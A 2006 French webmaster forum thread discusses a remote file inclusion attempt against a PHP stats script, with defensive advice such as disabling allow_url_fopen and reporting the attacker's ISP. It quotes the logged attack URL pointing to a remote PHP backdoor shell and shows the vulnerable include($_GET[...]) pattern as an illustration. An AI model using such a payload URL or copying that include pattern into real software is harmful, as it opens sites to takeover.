|
Voir le sujet précédent :: Voir le sujet suivant
|
| Auteur |
Message |
| |
|
Sak
WRInaute discret
Inscrit le: 03 Mai 2003
Messages: 80
Localisation: Paris-Dakar
|
 Posté le : Mar Oct 17, 2006 2:01 Sujet du message: Tentative de Hack ? |
|
|
J'utilise un script de stats dont j'ai protégé le repertoire avec un htaccess. J'ai fait de sorte qu'une tentative infructueuse m'envoit un mail avec la page référente, la page ayant générée l'erreur, l'Ip du visiteur, l'IP de son FAi, sa résollution, etc.
Hier, pour la première fois je reçois un mail d'une tentative d'accès et voici l'url d'accès: -http://www.soninkara.org/ .../xxx.php?url_hit=http://gupl.org/mail/shell.txt?
Alors intrigué et inquiet je me suis rendu à cet adresse +http://gupl.org/mail/shell.txt et quelle n'a été ma surprise de voir une page PHP et mon antivirus qui me dit avoir bloqué le virus PHP.Backdoor.TROJAN.
Je suis convaincu que c'est une tentative de piratage. Je possède l'url du visiteur et c'est un abonné de Free. La même IP est apparue aujourdhui encore en voulant faire la même chose.
Une question: je voudrais dénoncer cette tentative, devrai-je la faire chez Free ou à la Police ?
Si des personnes peuvent m'indiquer sur la façon de procéder, ce sera sympa. |
|
| |
|
 |
bigjet
WRInaute occasionnel
Inscrit le: 21 Nov 2004
Messages: 211
|
| Posté le : Mar Oct 17, 2006 2:25 Sujet du message: Tentative de Hack ? |
|
|
Il s'agit bien d'un pirate qui essaie de profiter d'une éventuelle faiblesse de ton site.
Il essaie d'executer le code php contenu dans son shell.txt à partir de ton site. Imagine que dans ta page php tu aies mis un code du genre:
<?php
include($_GET['url_hit']);
?>
Tu serais cuit car son code va être inclut et executé dans ton script.
Le remède: Ne JAMAIS utiliser une variable dans un include sans imposer des règles bien précises (exemple: lister toutes les possibilités que la variable peut prendre et tester à chaque fois si le contenu de la variable est valide). On peut aussi desactiver l'inclusion d'url distantes afin d'empêcher ce genre d'intrusions. |
|
| |
|
|
ebe327
WRInaute impliqué
Inscrit le: 13 Juin 2005
Messages: 340
Localisation: 22 vla les flics
|
| Posté le : Mar Oct 17, 2006 10:01 Sujet du message: Tentative de Hack ? |
|
|
| Tu n’utilises pas par hasard AWSTAT, j’ai eu le même phénomène |
|
| |
|
|
Suede
WRInaute accro
Inscrit le: 04 Oct 2002
Messages: 3630
Localisation: Suède
|
| Posté le : Mar Oct 17, 2006 10:46 Sujet du message: Tentative de Hack ? |
|
|
Ils essayent sur tous les scripts connus.
J'a banni le useragent libwww via htaccess.
François |
|
| |
|
|
Tilt
WRInaute passionné
Inscrit le: 26 Mar 2005
Messages: 744
|
| Posté le : Mar Oct 17, 2006 13:08 Sujet du message: Re: Tentative de Hack ? |
|
|
| Sak a écrit: |
Une question: je voudrais dénoncer cette tentative, devrai-je la faire chez Free ou à la Police ?
Si des personnes peuvent m'indiquer sur la façon de procéder, ce sera sympa. |
Pour ma part j'envoie une copie du mail à l'hébergeur sans m'attarder sur les détails et j'écris qq chose comme:
"mon moniteur de sécurité m'a averti d'une tentative d'intrusion sur mon site xy. le rapport indique que cette tentative provient de l'un de vos usagers (copie ci-joint, ip, email etc...). pourriez-vous faire le nécessaire auprès de votre client pour qu'il cesse ses agissements irréguliers ? ... je vous prie de m'avertir si vous ne parvenez pas à l'identifier afin que je puisse transmettre mes éléments aux services de police concernés." |
|
| |
|
|
Sak
WRInaute discret
Inscrit le: 03 Mai 2003
Messages: 80
Localisation: Paris-Dakar
|
| Posté le : Mar Oct 17, 2006 22:33 Sujet du message: Tentative de Hack ? |
|
|
| ebe327 a écrit: |
| Tu n’utilises pas par hasard AWSTAT, j’ai eu le même phénomène |
Il s'agit du script Kietu?. Je viens de faire part au responsable du script la tentative de hack.
Je vais envoyer un mail à son FAI c'est à dire FREE et je vous tiendrais au courant.
Je remercie toute la communauté WRI. |
|
| |
|
|
Pandore
WRInaute accro
Inscrit le: 14 Oct 2005
Messages: 1386
Localisation: Aix-Noulette (62)
|
| Posté le : Mar Oct 17, 2006 23:10 Sujet du message: Tentative de Hack ? |
|
|
| bigjet a écrit: |
| lister toutes les possibilités que la variable peut prendre et tester à chaque fois si le contenu de la variable est valide |
Pas toujours possible ... 
| bigjet a écrit: |
| On peut aussi desactiver l'inclusion d'url distantes afin d'empêcher ce genre d'intrusions. |
Comment tu mets ça en pratique ??? |
|
| |
|
|
Sak
WRInaute discret
Inscrit le: 03 Mai 2003
Messages: 80
Localisation: Paris-Dakar
|
| Posté le : Mer Oct 18, 2006 17:49 Sujet du message: Tentative de Hack ? |
|
|
| bigjet a écrit: |
| On peut aussi desactiver l'inclusion d'url distantes afin d'empêcher ce genre d'intrusions. |
Comment tu mets ça en pratique ???[/quote]
Je suis aussi preneur de cette solution.
Est ce via htaccess ?
 |
|
| |
|
|
Sak
WRInaute discret
Inscrit le: 03 Mai 2003
Messages: 80
Localisation: Paris-Dakar
|
| Posté le : Mer Oct 18, 2006 18:06 Sujet du message: Tentative de Hack ? |
|
|
Après recherche, il paraît que les pirates cherchent des serveurs mal configurés ayant Register_Globals est à ON. Il ne s'agit pas d'une faille de sécurité de Kietu? mais plutôt d'une faille créée par la configuration serveur
Dans mon exemple, cela définira bien une variable $_GET['url_hit'] qui contiendra +http://gupl.org/mail/shell.txt |
|
| |
|
|
bigjet
WRInaute occasionnel
Inscrit le: 21 Nov 2004
Messages: 211
|
| Posté le : Ven Oct 20, 2006 19:35 Sujet du message: Tentative de Hack ? |
|
|
| Sak a écrit: |
| bigjet a écrit: |
| On peut aussi desactiver l'inclusion d'url distantes afin d'empêcher ce genre d'intrusions. |
Comment tu mets ça en pratique ???
Je suis aussi preneur de cette solution.
Est ce via htaccess ?
|
Désolé de la réponse tardive.
Normalement ça se fait via le php.ini et c'est la variable allow_url_fopen qu'il faut mettre à off. |
|
| |
|
|
Sak
WRInaute discret
Inscrit le: 03 Mai 2003
Messages: 80
Localisation: Paris-Dakar
|
| Posté le : Sam Oct 21, 2006 2:03 Sujet du message: Tentative de Hack ? |
|
|
| Ok merci pour l'info |
|
| |
|
|
Pandore
WRInaute accro
Inscrit le: 14 Oct 2005
Messages: 1386
Localisation: Aix-Noulette (62)
|
| Posté le : Sam Oct 21, 2006 10:40 Sujet du message: Tentative de Hack ? |
|
|
| bigjet a écrit: |
| Normalement ça se fait via le php.ini et c'est la variable allow_url_fopen qu'il faut mettre à off. |
C'est pour les dédiés ça ? En mutualisé, on ne peut pas modifier le fichier php.ini ... C'est peut-être déjà à cet valeur. Il y a moyen de le savoir ou pas ???
Merci quand même de ta réponse, ça peut toujours servir  |
|
| |
|
|
thierry8
WRInaute accro
Inscrit le: 11 Juil 2005
Messages: 3252
|
| Posté le : Sam Oct 21, 2006 11:38 Sujet du message: Tentative de Hack ? |
|
|
oui tu peux le savoir via le phpinfo.
(une recherche sur la page phpinfo avec le nav.)
par contre ce qui m'intéresse c'est de savoir s'il est possible de désactiver la fonction via htaccess.
(ou même dans le code htaccess) |
|
| |
|
|
Pandore
WRInaute accro
Inscrit le: 14 Oct 2005
Messages: 1386
Localisation: Aix-Noulette (62)
|
| Posté le : Sam Oct 21, 2006 12:00 Sujet du message: Tentative de Hack ? |
|
|
| thierry8 a écrit: |
| une recherche sur la page phpinfo avec le nav. |
C'est-à-dire ??? Quelle page phpinfo ??? |
|
| |
|
|
rog
WRInaute accro
Inscrit le: 21 Sep 2006
Messages: 1662
Localisation: sapucaia do sul (RS)
|
| Posté le : Sam Oct 21, 2006 14:00 Sujet du message: Tentative de Hack ? |
|
|
faut mettre
echo phpinfo();
dans une page
rog |
|
| |
|
|
| |
|
|
